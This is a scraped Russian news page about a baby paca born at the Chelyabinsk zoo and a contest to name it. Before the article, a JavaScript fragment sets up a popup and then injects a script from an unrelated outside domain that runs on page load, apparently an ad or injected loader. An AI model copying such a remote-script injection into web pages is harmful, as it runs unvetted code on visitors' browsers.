, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В челябинском зоопарке у семьи грызунов появилось пополнение

В семейство пак, обитающих в челябинском зоопарке, появился детеныш. Новорожденный малыш, несмотря на юный возраст, ведет себя уже вполне самостоятельно - сам принимает пищу и даже пытается шалить. Опытные родители, а для семейства грызунов это уже восьмой детеныш, во всем помогают своему чаду. Сейчас в зоопарке объявили конкурс на самую лучшую кличку для малыша пака. Пока он побудет с папой и мамой, а когда подрастет, отправится в один из российских зоопарков.

Добавим, в живой природе паки обитают в тропических лесах Южной Америки. В челябинском зоопарке для них оборудован специальный вольер.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
20:36 - 20 февраля 2014
|
автор: U-RSS
|
(529)
|
(0)

Комментарии (0)

Я человек
Я бот